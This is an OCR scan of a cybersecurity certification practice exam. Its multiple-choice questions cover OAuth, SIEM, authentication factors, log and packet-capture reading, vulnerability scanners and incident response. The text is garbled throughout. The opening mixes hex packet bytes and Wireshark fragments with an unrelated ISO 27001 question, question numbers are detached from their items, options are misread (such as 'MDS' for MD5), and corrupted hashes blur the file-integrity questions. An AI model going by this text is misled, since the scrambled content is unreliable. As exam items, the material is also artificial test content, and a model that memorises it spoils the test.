Class: IN (@x@001) 


00 1f c9 8f ec 00 98 eð 
00 41 e9 fa 00 00 40 11 
að 63 b® Od 00 35 00 2d 
0O 00 00 00 00 00 28 63 
67 6f 6f 67 6c 65 03 63 


What type of organizations are required to adopt the ISO 27001 standard for 


d9 87 8a 73 08 00 45 00 
8f 7b ða 24 13 e2 42 cd 
76 10 9c 48 01 00 00 01 
6c 69 65 6e 74 73 34 06 
6f 6d 00 00 01 00 01 


TCP 66 
DNS 119 
QUIC 368 
QUIC 555 
QUIC 89 
QUIC 263 
QUIC 59 
QUIC 84 


BG 


5222 ~+ 50636 [ACK] Seq=2852 Ack=1516 Win=230 Len=0 TSval=845444413 TSecr=414173000 
Standard query response @x9c48 A clients4.google.com CNAME clients. l.google.com A 172.217.1.46 


Payload 
Payload 
Payload 
Payload 
Payload 
Payload 


2 bits) on interface 0 
Ethernet II, Src: Apple_87:8a:73 (98:e0:d9:87:8a:73), Dst: Cisco_8f:ec:00 (00:1f:c9:8f:ec:00) 
Internet Protocol Version 4, Src: 10.36.19.226, Dst: 66.205.160.99 
User Datagram Protocol, Src Port: 45069, Dst Port: 53 


Requesting name resolution 


(Encrypted), 
(Encrypted), 
(Encrypted), 
(Encrypted), 
(Encrypted), 
(Encrypted), 


ncrypter 


Responding to a name resolution request 


Requesting mail server access 


Responding to a mail server access request 


cybersecurity? 


A. 


B. 
C. 
D. 


Healthcare organizations 


Financial services firms 


Educational institutions 


None of the above 


: 186, CID: 9422862884960226725 


: 187, CID: 9422862884960226725 
: 18177 
: 18433 
: 18689 
: 188, CID: 9422862884960226725 
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154. Ursula is a security administrator for an organization that provides web services that partici- 
pate in federated identity management using the OAuth framework. Her organization’s role 
is to operate the web service that users access once they have received authorization from 
their identity provider. Which type of OAuth component does Ursula’s group manage? 


A. Clients 
B. Resource owners 
C. Resource servers 
D. Authorization servers 
155. Colin is looking for a solution that will help him aggregate the many different sources 


of security information created in his environment and correlate those records for relevant 
security issues. Which one of the following tools would assist Colin with this task? 


A. DLP 
B. SIEM 
C. IPS 

D. CRM 


156. Which one of the following is not an example of a physical security control? 
A. Network firewall 
B. Door lock 
C. Fire suppression system 


D. Biometric door controller 


157. Which of the following authentication factors did NIST recommend be deprecated in 2016? 
A. Retina scans 
B. Fingerprints 
C. SMS 
D. Application-generated tokens 
158. The Open Web Application Security Project (OWASP) maintains an application called 


Orizon. This application reviews Java classes and identifies potential security flaws. 
What type of tool is Orizon? 


A. Fuzzer 
B. Static code analyzer 
C. Web application assessor 
D. Fault injector 
159. During the design of an identity and access management authorization scheme, Katie 
took steps to ensure that members of the security team who can approve database access 


requests do not have access to the database themselves. What security principle is Katie 
most directly enforcing? 


A. Least privilege 


B. Separation of duties 


160. 


161. 


162. 


163. 
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C. Dual control 


D. Security through obscurity 


Which one of the following characters would not signal a potential security issue during 
the validation of user input to a web application? 


A. < 
B. ' 
C. > 
D. $ 


Dave is a web application developer who is working in partnership with system engineers 
in a DevOps environment. He is concerned about the security of a web application he is 
deploying and would like a reference benchmark to help secure the web server that will be 
hosting his application. Which one of the following sources would best meet Dave’s needs? 


A. OWASP 


B. SANS 
C. CIS 
D. NSA 


Which one of the following controls is useful to both facilitate the continuity of operations 
and serve as a deterrent to fraud? 


A. Succession planning 

B. Dual control 

C. Cross-training 

D. Separation of duties 

Tom is concerned about the integrity of a file, so he runs the shasum utility on it. The fol- 


lowing figure shows the results of running it on two separate days. What conclusion can 
Tom draw from these results? 


Wed Sep 27: shasum < ridership.txt 
e8caf4fce2fbb425294ce3c889a0f877cal8ea8t - 
Wed Sep 27: || 





Terminal 


Fri Sep 29: shasum < ridership.txt 
e8caf4fce2fbb425294ce3c889a0F877calBeaBF - 
Fri Sep 29: J 
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The file experienced significant modification between Wednesday and Friday. 
The file experienced minor modification between Wednesday and Friday. 
The file verified on Friday is identical to the file from Wednesday. 


Tom does not have enough information to draw any of these conclusions. 


Questions 164-166 refer to the following scenario: 


Maureen is designing an authentication system upgrade for her organization. The organi- 
zation currently uses only password-based authentication and has been suffering a series 
of phishing attacks. Maureen is tasked with upgrading the company’s technology to better 
protect against this threat. 


164. Maureen would like to achieve multifactor authentication. Which one of the following 
authentication techniques would be most appropriate? 


A. 
B. 
C. 
D. 


PIN 
Security questions 
Smartcard 


Password complexity 


165. Which one of the following technologies is not suitable for Maureen to use as a second fac- 
tor because of security issues with its implementation? 


A. 
B. 
C. 
D. 


HOTP tokens 
TOTP tokens 

SMS messages 
Soft tokens 


166. Maureen would like to add technology that makes risk-based decisions about authentica- 
tion complexity, requiring multifactor authentication in cases where the user’s login seems 
unusual. What technology is Maureen seeking to add? 


A. 
B. 
C. 
D. 


Multifactor authentication 
Context-based authentication 
Dual authentication 


Biometric authentication 


167. Which one of the following security architectural views would provide details about the 
flow of information in a complex system? 


A. 


B. 
C. 
D 


Technical view 
Logical view 
Firewall view 


Operational view 


168. 


169. 


170. 


171. 


172. 
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Jane is working in a PCI DSS—compliant environment and is attempting to secure a legacy 
payment application. The application does not allow for passwords longer than six charac- 
ters, in violation of PCI DSS. Which one of the following would be a reasonable compen- 
sating control in this scenario? 


A. Lock users out after six incorrect login attempts. 

B. Limit logins to the physical console. 

C. Require multifactor authentication. 

D. Require the use of both alphabetic and numeric characters in passwords. 

Gina’s organization recently retired their last site-to-site VPN connection because of lack 


of use. Gina consulted the policy repository and found that there is a standards document 
describing the requirements for site-to-site VPNs. How should Gina address this standard? 


A. Leave it in place in case the organization decides to implement a site-to-site VPN in 
the future. 


B. Retire the standard and archive it. 

C. Update the standard with a note that there are no current deployments. 

D. Place the standard on an annual review cycle. 

Which one of the following test types typically involves an evaluation of the application by 
end users? 

A. Stress testing 

B. Fuzz testing 

C. Acceptance testing 

D. Regression testing 

Carla is consulting with a website operator on an identity management solution. She 
would like to find an approach that leverages federated identity management and provides 


service authorization. Which one of the following technologies would be best suited for 
her needs? 


A. OpenID 

B. Active Directory 

C. Kerberos 

D. OAuth 

Susan wants to provide authentication for APIs using an open standard. Which of the fol- 


lowing protocols is best suited to her purposes if she intends to connect to existing cloud 
service provider partners? 


A. RADIUS 
B. SAML 

C. OAuth 

D. TACACS+ 
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173. Haley is planning to deploy a security update to an application provided by a third-party 
vendor. She installed the patch in a test environment and would like to determine whether 
applying the patch creates other issues. What type of test can Haley run to best determine 
the impact of the change? 


A. Regression testing 
B. User acceptance testing 
C. Stress testing 
D. Vulnerability scanning 
174. In a kaizen approach to continuous improvement, who bears responsibility for the 
improvement effort? 
A. The manager most directly responsible for the process being improved 
B. The team responsible for the process 
C. The continuous improvement facilitator 
D. The most senior executive in the organization 
175. Nick is designing an authentication infrastructure and wants to run an authentication 


protocol over an insecure network without the use of additional encryption services. 
Which one of the following protocols is most appropriate for this situation? 


A. RADIUS 
B. TACACS 
C. TACACS+ 


D. Kerberos 


176. Helen is reviewing her organization’s network design, shown here. Which component 
shown in the diagram is a single point of failure for the organization? 


Firewalls 


> an Á Routers 


Core 
Switches 





Distribution 
Router 


Edge Switches 


177. 


178. 


179. 


180. 


181. 
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Firewall 
Upstream router 


Core switch 


99 D> 


Distribution router 


Greg is designing a defense-in-depth approach to securing his organization’s information 
and would like to select cryptographic tools that are appropriate for different use cases 
and provide strong encryption. Which one of the following pairings is the best use of 
encryption tools? 


A. SSL for data in motion and AES for data at rest 

B. VPN for data in motion and SSL for data at rest 

C. TLS for data in motion and AES for data at rest 

D. SSL for data in motion and TLS for data at rest 

Francine would like to assess the security of her organization’s wireless networks. Which 
one of the following network security tools would be best suited for this task? 

A. Wireshark 

B. tcpdump 

C. nmap 

D. aircrack-ng 

Belinda is configuring an OpenLDAP server that will store passwords for her organiza- 


tion. Which one of the following password storage schemes will provide the highest level 
of security? 


A. CRYPT 
B. SSHA 
C. MDS 

D. SASL 


Robin is planning to deploy a context-based authentication system for her organization. 
Which one of the following factors is not normally used as part of the authentication context? 


A. Geolocation 

B. User behavior 

C. Time of day 

D. Password complexity 

Miguel works for a company that has a network security standard requiring the collection 
and storage of NetFlow logs from all data center networks. Miguel is working to commis- 
sion a new data center network but, because of technical constraints, will be unable to collect 


NetFlow logs for the first six months of operation. Which one of the following data sources 
is best suited to serve as a compensating control for the lack of NetFlow information? 


A. Router logs 
B. Firewall logs 
C. Switch logs 
D. IPS logs 
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182. 


183. 


184. 


185. 


186. 
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Which one of the following tools is the most widely used implementation of Transport 
Layer Security in use today? 


A. OpenSSL 

B. SecureSSL 

C. SecureILS 

D. OpenTLS 

Ken would like to configure an alarm to alert him whenever an event is recorded to syslog 


that has a critical severity level. What value should he use for the severity in his alert that 
corresponds to critical messages? 


A. 0 
B. 2 
C. 5 
D. 7 


Ashley is working with software developers to evaluate the security of an application they 
are upgrading. She is performing testing that slightly modifies the application code to help 
identify errors in code segments that might be infrequently used. What type of testing is 
Ashley performing? 


A. Stress testing 

B. Fuzz testing 

C. Fault injection 

D. Mutation testing 

Don is considering the deployment of a self-service password reset mechanism to reduce 
the burden on his organization’s help desk. The solution will provide password resets for 
the organization’s SSO system. He is concerned that attackers might use this mechanism to 


compromise user accounts. Which one of the following authentication approaches would 
best meet the business need while addressing Don’s security concerns? 


A. Two-factor authentication combining a password and token 

B. Passcode sent via SMS to a cell phone 

C. Email link to a password reset web page 

D. Security questions 

Patrick is reviewing the contents of a compromised server and determines that an intruder 
installed a tool called John the Ripper. What is the purpose of this tool? 

A. Stealing copyrighted media content 

B. Cracking passwords 


C. 
D. 
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Monitoring network traffic 


Launching DDoS attacks 


Questions 187-190 refer to the following scenario: 


Bill is reviewing the authentication logs for a Linux system that he operates and encounters 
the following log entries: 


Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: Accepted publickey for ec2-user from 10.174.238.88 port 
57478 ssh2: RSA eS: f5:¢1:46:bb:49:a1:43:da:9d:50:¢5:37:bd:79:22 

Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: pam_unix(sshd:session): session opened for user ec2-use 
r by (uid=0) 

Aug 30 09:48:06 ip-172-30-0-62 sudo: ec2-user : TTY=pts/® ; PWD=/home/ec2-user ; USER=root ; COMMA 

ND=/bin/bash 


187. What is the IP address of the system where the user was logged in when he or she initiated 
the connection? 


A. 
B. 
C. 
D. 


172.30.0.62 
62:0:30.172 
10.174.238.88 
9.48.6.0 


188. What service did the user use to connect to the server? 


A. 
B. 
C. 
D. 


HTTPS 
PTS 
SSH 
Telnet 


189. What authentication technique did the user use to connect to the server? 


A. 
B. 
C. 
D. 


Password 
PKI 
Token 


Biometric 


190. What account did the individual use to connect to the server? 


A. 


B. 
C. 
D 


root 
ec2-user 
bash 


pam_unix 
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Questions 191-194 refer to the following scenario: 


Maggie is reviewing the ssl_request_log file on a web server operated by her company 


and sees the messages shown here: 
[30/Aug/2017:09:47:25 -0400] 129.74.238.88 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 " 
GET /wp-content/themes/bridge/css/font-—awesome/ fonts/ fontawesome-webfont.woff2?v 
=4.6.3 HTTP/1.1" - 
[30/Aug/2017:09:47:32 -0400] 54.204.189.233 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 
“GET / HTTP/1.1" 31266 
[30/Aug/2017: 09:49:34 -0400) 157.55.39.18 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET / 
robots.txt HTTP/1.1" - 
[30/Aug/2017:09:49:35 -0400] 157.55.39.18 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET / 
robots.txt HTTP/1.1" 67 
[30/Aug/2017:09:49:35 -0400] 157.55.39.18 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET / 
robots.txt HTTP/1.1" - 
[30/Aug/2017:09:49:36 -0400] 157.55.39.18 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET / 
robots.txt HTTP/1.1" 67 
[30/Aug/2017:09:49:41 -0400] 157.55.39.166 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 " 
GET / HTTP/1.1" - 
[30/Aug/2017: 09:58:03 -0400) 188.71.247.207 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 
“GET /about-me/ HTTP/1.1" 6605 
[30/Aug/2017:09:58:04 -0400] 188.71.247.207 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 
“GET /wp-content/uploads/2017/04/about-me-page_PSD_03.jpg HTTP/1.1" 98820 
[30/Aug/2017:09:58:04 -0400) 188.71.247.207 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 
“GET /wp-content/uploads/2017/04/about-me-page_PSD_02.jpg HTTP/1.1" 224717 
[root@ip-172-30-0-60 httpd]# J x 


191. What type of user is most likely originating from the IP address 157.55.39.18? 
A. Malicious hacker 
B. Search engine crawler 


C. Normal web user 
D. API user 


192. What type of user is most likely originating from the IP address 188.71.247.207? 
A. Malicious hacker 
B. Search engine crawler 


C. Normal web user 
D. API user 


193. Which one of the following conclusions can Maggie reach about the web server based 
upon interpreting the logs? 


A. The web server is using an insecure version of TLS. 
B. The web server is using an insecure version of SSL. 
C. The web server is using outdated ciphers. 


D. None of the above 


194. Based upon Maggie’s review of the logs, which one of the following statements is correct? 
A. The server allows encrypted connections. 
B. The server does not allow unencrypted connections. 
C. The server does not allow access by web crawlers. 
D 


The server contains network access restrictions. 


195. 


196. 
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Which one of the following components is not normally part of an endpoint security suite? 
A. IPS 


B. Firewall 
C. Antimalware 
D. VPN 


Wanda is responsible for account life-cycle management at her organization and would 
like to streamline the process, which she feels is ineffective and contains too many steps. 
Which one of the following approaches may assist with this task? 


A. Regression 

B. Waterfall 

C. Agile 

D. Lean Six Sigma 


Questions 197-200 refer to the following scenario: 


197. 


198. 


199. 


Veronica was recently hired to develop a vulnerability management program for her orga- 
nization. The organization currently does not have any tools for vulnerability scanning, 
and Veronica would like to build out the initial toolset. 


Veronica would like to select a network vulnerability scanner that is provided by a com- 
mercial vendor and widely used within the cybersecurity community. Which one of the 
following tools would best meet her needs? 


A. OpenVAS 
B. MBSA 
C. Acunetix 
D. Qualys 


Veronica would like to supplement her network vulnerability scanner with a solution that 
can specifically identify flaws in Windows servers. Which tool would best meet her needs? 


A. MBSA 

B. Acunetix 

C. Nexpose 

D. Nikto 

After purchasing a commercial network vulnerability scanner, Veronica does not have any 
funds remaining to purchase a web application scanner, so she would like to use an open 


source solution dedicated to that purpose. Which one of the following products would best 
meet her needs? 


A. Acunetix 


B. OpenVAS 
C. Nikto 
D. Nexpose 
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201. 


202. 


203. 
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As she continues her product selection, Veronica realizes that the organization does not 
have adequate network monitoring and log analysis tools. She would like to select a suite 
of open source tools that would provide her with comprehensive monitoring. Which one of 
the following tools would be the least appropriate to include in that set? 


A. Cacti 


B. MRTG 
C. Solarwinds 
D. Nagios 


Jacob would like to standardize logging across his organization, which consists of a mix- 
ture of Windows and Linux systems as well as Cisco network devices. Which logging 
approach would work best for Jacob? 


A. Syslog 

B. Event Viewer 
C. SCCM 

D. Prime 


The Open Web Application Security Project (OWASP) maintains a listing of the most 
important web application security controls. Which one of these items is least likely to 
appear on that list? 


A. Implement identity and authentication controls. 
B. Implement appropriate access controls. 
C. Obscure web interface locations. 


D. Leverage security frameworks and libraries. 


Javier ran the shasum command two consecutive times on a file named coal.r and saw 
the results shown here. What conclusion can Javier draw from this result? 


mchapple $shasum coal.r 
84bf8c31726c2137fd4383999c2f5e943ff7fcbe coal.r 
mchapple $ 

mchapple $ 

mchapple $ 

mchapple $shasum coal.r 
48¢c001694967435fc5b3c430007a41eff3db7569 coal.r 
mchapple $ 


The file is intact. 
The file was modified. 


The file was removed. 


90 9 > 


Javier cannot reach any of these conclusions based upon the limited evidence available 
to him. 
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204. Leo is investigating a security incident and turned to the logs from his identity and access 
management system to determine the last time that a specific user authenticated to any 
system in the organization. What identity and access management function is Leo using? 


205. 


206. 


207. 


A. 
B. 
C. 
D. 


Identification 
Authentication 
Authorization 


Accounting 


Tim is a web developer and would like to protect a new web application from man-in- 
the-middle attacks that steal session tokens stored in cookies. Which one of the following 
security controls would best prevent this type of attack? 


A. 
B. 
C. 
D. 


Forcing the use of TLS for the web application 
Forcing the use of SSL for the web application 
Setting the secure attribute on the cookie 


Hashing the cookie value 


What type of malicious software might an attacker use in an attempt to maintain access to 
a system while hiding his or her presence on the system? 


A. 
B. 
C. 
D. 


Rootkit 
Worm 
Trojan horse 


Virus 


Max is the security administrator for an organization that implements a remote-access 
VPN. The VPN depends upon RADIUS authentication, and Max would like to assess the 
security of that service. Which one of the following hash functions is the strongest crypto- 
graphic supported by RADIUS? 


A. 


B. 
C. 
D 


MDS 
SHA-1 
SHA-512 
HMAC 
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208. Laura requests DNS information about the nytimes.com domain using the ns Lookup 
command and receives the results shown here. Which one of the following conclusions can 
Laura reach about the domain based upon these results? 
> nytimes.com 
;; Truncated, retrying in TCP mode. 


Server: 66.205.160.99 
Address: 66.205.160. 99#53 


Non-authoritative answer: 


nytimes.com rdata_257 = \# 19 0005697373756573796D616E7465632E636F6D 

nytimes.com rdata_257 = \# 19 00056973737565636F6D6F646F63612E636F6D 

nytimes.com rdata_257 = \# 19 0005697373756564696769636572742E636F6D 

nytimes.com text = "google-site-verification=ZsySMeZ_SRbJZFu-S3ptepytP7hSpxHO@qAg8Z2bKug" 

nytimes.com text = "MS=ms22827202" 

nytimes.com text = "253961548-4297453" 

nytimes.com text = "google-site-verification=4TE2qgqBoy6PktLjtZ03t32A20EZO@VDOPYE6MnTj 8IL_g" 

nytimes.com text = "MS=A1BFCA84E21B7011CA98DFSDC251CDDF90E0174B" 

nytimes.com text = “adobe-idp-site-verification=5ce4d99c-af0a-—4b76-9217-—bd49d3336d FO" 

nytimes.com text = "v=spf1 mx ptr ip4:170.149.160.0/19 ip4:209.11.220.51/32 include:alerts.wallst.com 


ndgrid.net include:_spf.google.com include:inyt.com ~all" 


nytimes.com text = "google-site-verification=j ZcmQFxPEP38yqYpmRvoOv_ShQFAGBZPUEBwTNUPUF8" 
nytimes.com mail exchanger = 1 ASPMX.L.GOOGLE.com. 
nytimes.com mail exchanger = 10 ASPMX2.GOOGLEMAIL.com. 
nytimes.com mail exchanger = 10 ASPMX3.GOOGLEMAIL.com. 
nytimes.com mail exchanger = 5 ALT1.ASPMX.L.GOOGLE.com. 
nytimes.com mail exchanger = 5 ALT2.ASPMX.L.GOOGLE.com. 
nytimes.com 
Origin = ns1.p24.dynect.net 
mail addr = hostmaster.nytimes.com 


serial = 2017091015 
refresh = 300 


retry = 150 
expire = 1209600 
minimum = 300 
Name: nytimes.com 
Address: 151.101.65.164 
Name: nytimes.com 
Address: 151.101.1.164 
Name: nytimes.com 
Address: 151.101.129.164 
Name: nytimes.com 
Address: 151.101.193.164 
nytimes.com nameserver = ns1.p24.dynect.net. 
nytimes.com nameserver = ns2.p24.dynect.net. 
nytimes.com nameserver = dns-plx.ewrl.nytimes.com. 
nytimes.com nameserver = dns-plx.seal.nytimes.com. 
nytimes.com nameserver = ns3.p24.dynect.net. 
nytimes.com nameserver = ns4.p24.dynect.net. 
A. The nytimes.com DNS server is located at 66.205.160.99. 
B. The nytimes.com web server has a single address. 
C. The nytimes.com email domain is hosted by Google. 
D. The nytimes.com website uses Google Analytics. 


Questions 209-211 refer to the following scenario: 


Cody recently detected unusual activity on a set of servers running in his organization’s 
data center. He discovered that these servers were running at close to 100% capacity for 
extended periods of time. After performing a historical analysis, he determined that this 
was unusual, as the servers rarely reached full utilization during the previous year. He then 
reviewed the processes on those servers and found that they were running cryptocurrency 
mining software. 
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209. Which one of the following sources of information would be most useful to Cody as he 


210. 


211. 


212. 


213. 


seeks to determine the identity of the individual responsible for the installation of this 
software? 


A. Server logs 

B. Netflow records 
C. Kerberos logs 
D. IPS logs 


If Cody determines that an individual installed this software for personal gain, which one 
of the following security policies was most likely violated? 


A. Information classification policy 

B. Acceptable use policy 

C. Bitcoin mining policy 

D. Identity management policy 

Based upon his analysis, what type of control might Cody consider implementing to more 
quickly identify similar issues in the future? 

A. Intrusion prevention 

B. Authentication anomaly detection 

C. Vulnerability scanning 

D. Configuration management 

Xavier is reviewing the design for his organization’s security program and he is concerned 
about the ability of the organization to conduct malware analysis that would detect zero- 


day attacks. Which one of the following cloud-based service models would allow Xavier to 
most easily meet this requirement? 


A. IaaS 

B. PaaS 

C. SECaaS 
D. I[DaaS 


Glenn would like to adopt a web application firewall for his company. Which one of the 
following products would NOT be suitable for his first round of evaluation? 


A. Imperva 

B. NAXSI 

C. Network General 
D. ModSecurity 
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214. Vincent is conducting fuzz testing using Peach Fuzzer, a common input fuzzing tool. Peach 
Fuzzer incorporates functionality formerly included in the Untidy fuzzer project. Which 
one of the following sources is Vincent LEAST likely to be able to fuzz with this product? 


215. 


A. 
B. 
C. 
D. 


Web application input 
XML 
TCP/IP 


Firewall rules 


Lynda is a security professional consulting with her organization’s software development 
team on the inclusion of security best practices in their SDLC. She consults the Center for 
Internet Security’s system design recommendations. Which one of the following control 
categories is most likely to contain information helpful to her consulting effort? 


A. 


B. 
C. 
D 


Inventory of authorized and unauthorized devices 
Controlled use of administrative privileges 
Application software security 


Malware defenses 


Practice Exam 1 
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While reviewing network flow logs, John sees that network flow on a particular segment 
suddenly dropped to zero. What is the most likely cause of this? 


A. A denial-of-service attack 

B. A link failure 

C. High bandwidth consumption 

D. Beaconing 

Charlotte is having a dispute with a co-worker over access to information contained in a 
database maintained by her co-worker’s department. Charlotte insists that she needs the 
information to carry out her job responsibilities, while the co-worker insists that nobody 
outside the department is allowed to access the information. Charlotte does not agree that 
the other department should be able to make this decision, and Charlotte’s supervisor 


agrees with her. What type of policy could Charlotte turn to for the most applicable 
guidance? 


A. Data classification policy 

B. Data retention policy 

C. Data ownership policy 

D. Acceptable use policy 

Frank is conducting the recovery process after his organization experienced a security 


incident. During that process, he plans to apply patches to all of the systems in his environ- 
ment. Which one of the following should be his highest priority for patching? 


A. Windows systems 

B. Systems involved in the incident 
C. Linux systems 

D. Web servers 


Susan’s organization suffered from a major breach that was attributed to an advanced per- 
sistent threat (APT) that used exploits of zero-day vulnerabilities to gain control of systems 
on her company’s network. Which of the following is the least appropriate solution for 
Susan to recommend to help prevent future attacks of this type? 


A. Heuristic attack detection methods 

B. Signature-based attack detection methods 

C. Segmentation 

D. Leverage threat intelligence 

During his investigation of a Windows system, Eric discovered that files were deleted and wants 


to determine whether a specific file previously existed on the computer. Which of the following 
is the least likely to be a potential location to discover evidence supporting that theory? 


A. Windows registry 
B. Master File Table 
C. INDxX files 

D. Event logs 


10. 
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As part of her duties as an SOC analyst, Emily is tasked with monitoring intrusion detec- 
tion sensors that cover her employer’s corporate headquarters network. During her shift, 
Emily’s IDS alarms report that a network scan has occurred from a system with IP address 
10.0.11.19 on the organization’s WPA2 enterprise wireless network aimed at systems in the 
finance division. What data source should she check first? 


A. Host firewall logs 

B. AD authentication logs 

C. Wireless authentication logs 
D. WAF logs 


Casey’s incident response process leads her to a production server that must stay online for 
her company’s business to remain operational. What method should she use to capture the 
data she needs? 


A. Live image to an external drive. 

B. Live image to the system’s primary drive. 

C. Take the system offline and image to an external drive. 

D. Take the system offline, install a write blocker on the system’s primary drive, and then 


image it to an external drive. 


During a routine upgrade, Maria inadvertently changes the permissions to a critical direc- 
tory, causing an outage of her organization’s RADIUS infrastructure. How should this 
threat be categorized using NIST’s threat categories? 


A. Adversarial 
B. Accidental 
C. Structural 


D. Environmental 


What does the nmap response “filtered” mean in port scan results? 

A. nmap cannot tell whether the port is open or closed. 

B. A firewall was detected. 

C. An IPS was detected 

D. There is no application listening, but there may be one at any time. 

Darcy is the security administrator for a hospital that operates in the United States and is 
subject to the Health Insurance Portability and Accountability Act (HIPAA). She is design- 
ing a vulnerability scanning program for the hospital’s data center that stores and processes 


electronic protected health information (ePHI). What is the minimum scanning frequency 
for this environment, assuming that the scan shows no critical vulnerabilities? 


A. Every 30 days 
B. Every 90 days 
C. Every 180 days 
D 


No scanning is required. 
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11. During her review of incident logs, Laura discovers the initial entry via SSH on a front- 
facing bastion host (A) at 8:02 a.m. If the network that Laura is responsible for is designed 
as shown here, what is the most likely diagnosis if the second intrusion shows up on host B 
at 7:15 a.m.? 


A -ssh bastion 
host 





Firewall 


Stateful firewall ruleset: 
1. Allow A -> B via tcp 22. 
2. Deny all. 





B — internal 


= | 
7 management 


system 


A. Internal host B was previously compromised. 
B. Host A was compromised; then host B was compromised. 
C. Host B and host A are not both synchronized to NTP properly. 
D. An internal threat compromised host B and then host A. 
12. Matt recently ran a vulnerability scan of his organization’s network and received the results 
shown here. He would like to remediate the server with the highest number of the most 


serious vulnerabilities first. Which one of the following servers should be on his highest 
priority list? 





Server A X Vulnerabilities 
Saver B x 
SmwaD (LD x 

x 
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A. Server A 
B. Server B 
C. Server C 
D. Server D 


. Frank has been tasked with conducting a risk assessment for the midsize bank that he 
works at because of a recent compromise of their online banking web application. Frank 
has chosen to use the NIST 800-30 risk assessment framework shown here. What 
likelihood of occurrence should he assign to breaches of the web application? 


Step 1: Prepare for Assessment 


Derived from Organizational Risk Frame 


Step 2: Conduct Assessment 
Expanded Task View 


Identify Threat Sources and Events 


Identify Vulnerabilities and 


Predisposing Conditions 


Determine Likelihood of Occurrence 
Determine Magnitude of Impact 
Determine Risk 


Step 4: Maintain Assessment 


” 
= 
=> 
” 
(c) 
cc 
©% 
— 
© 
= 
= 
= 
Ee 
z 
© 
© 
Pay 
a 
©% 
— 
N 





A. Low 

B. Medium 

C. High 

D. Cannot be determined from the information given 
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14. 


15. 


16. 


17. 
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Hank’s boss recently came back from a CEO summit event where he learned about the 
importance of cybersecurity and the role of vulnerability scanning. He asked Hank about 
the vulnerability scans conducted by the organization and suggested that instead of running 
weekly scans that they simply configure the scanner to start a new scan immediately after 
the prior scan completes. How should Hank react to this request? 


A. Hank should inform the CEO that this would have a negative impact on system perfor- 
mance and is not recommended. 


B. Hank should immediately implement the CEO’s suggestion. 


C. Hank should consider the request and work with networking and engineering teams on 
possible implementation. 


D. Hank should inform the CEO that there is no incremental security benefit from this 
approach and that he does not recommend it. 


Selah’s organization suffers an outage of its point-to-point encrypted VPN because of a sys- 
tem compromise at its ISP. What type of issue is this? 


A. Confidentiality 
B. Availability 


C. Integrity 
D. Accountability 


Garrett is working with a database administrator to correct security issues on several 
servers managed by the database team. He would like to extract a report for the DBA that 
will provide useful information to assist in the remediation effort. Of the report templates 
shown here, which would be most useful to the DBA team? 


~ Title a Type Vulnerability Data 


) 2008 SANS Top 20 Report {ZA Host Based 
©) Executive Report Gq Host Based 
4%) High Severity Report @q Host Based 
(©) Payment Card Industry (PCI) Executive Report {A Scan Based 
(©) Payment Card Industry (PCI) Technical Report {A Scan Based 


4) Qualys Patch Report © Host Based 


) Qualys Top 20 Report {ZA Host Based 


© Technical Report @q Host Based 





©) Unknown Device Report ++ Scan Based 


Qualys Top 20 Report 
Payment Card Industry (PCI) Technical Report 


Executive Report 
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Technical Report 


Bob’s Solarwinds network monitoring tools provide data about a system hosted in 
Amazon’s AWS environment. When Bob checks his server’s average response time, he sees 
the results shown here. 
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Min/Max/Average Response Time & Packet Loss EXPORT HELP 


AMI (AWS) 
Apr 21 2017, 12:30 pm- Apr 22 2017, 12:30 pm 


Zoom ìh 12h 24h 


1500 ms 


1000 ms 


500 ms 


RESPONSE TIME IN MILLISECONDS 


Oms 





w EB Average Response Time AMI (AWS) 
4 E Percentile 95% 

A E Min/Max Response Time AMI (AWS) 
Z GB % Packet Loss AMI (AWS) 


solarwinds Ý 


What action should Bob take based on this information? 


A. 
B. 
C. 
D. 


He should increase the speed of his network link. 
He should check for scheduled tasks that the times he sees spike. 
He should ensure that his network card has the proper latency settings. 


He should perform additional diagnostics to determine the cause of the latency. 


18. Alex notices the traffic shown here during a Wireshark packet capture. What is the host 
with IP address 10.0.2.11 most likely doing? 


File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 


4EdOQRS@ARE VC emeFeagwaaake 
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No. 





r 


Time Source Destination Protocol Lengtt Info 
3 0.023433501 10.0.2.11 192.168.1.1 DNS 82 Standard query 0x4daa PTR 15.2.0.10.in-addr.arpa 
7 10.0.2.15 TCF 60 36410 — 1723 [SYN] Seq=0 Win=1024 Len=0 MSS=1460 


0.072131619 10.0.2.11 
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A. 
B. 
C 

D. 


19. Jenny is evaluating the security of her organization’s network management practices. She 
discovers that the organization is using RADIUS for administrator authentication to net- 
work devices. What additional security control should also be in place to ensure secure 
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UDP-based port scanning 
Network discovery via TCP 
SYN based port scanning 
DNS based discovery 


operation? 

A. IPsec 

B. Kerberos 
C. TACACS+ 
D. SSL 


20. Jake is building a forensic image of a compromised drive using the dd command with its 
default settings. He finds that the imaging is going very slowly. What parameter should he 


adjust first? 


A. 


D. 


21. What purpose does a honeypot system serve when placed on a network as shown here? 


if 
bs 
of 


count 


Border Router Æ <» 


L Á 
| | = Honeypot 





Firewall or 
Unified 
Security 
Device 






Internal 
Trusted 
Zone 








22. 


23. 


24. 


25. 


26. 
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It prevents attackers from targeting production servers. 
It provides information about the techniques attackers are using. 


It slows down attackers like sticky honey. 
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It provides real-time input to IDSs and IPSs. 


Danielle’s security team has found consistent evidence of system compromise over a period 
of weeks, with additional evidence pointing to the systems they are investigating being com- 
promised for years. Despite her team’s best efforts, Danielle has found that her team cannot 
seem to track down and completely remove the compromise. What type of attack is 
Danielle likely dealing with? 


A. A Trojan horse 

B. An APT 

C. A rootkit 

D. A zero-day attack 

Which one of the following metrics would be most useful in determining the effectiveness 
of a vulnerability remediation program? 

A. Number of critical vulnerabilities resolved 

B. Time to resolve critical vulnerabilities 

C. Number of new critical vulnerabilities per month 

D. Time to complete vulnerability scans 

Mike’s nmap scan of a system using the command nmap 192.168.1.100 does not return 
any results. What does Mike know about the system if he is sure of its IP address, and why? 
A. The system is not running any open services. 

B. All services are firewalled. 

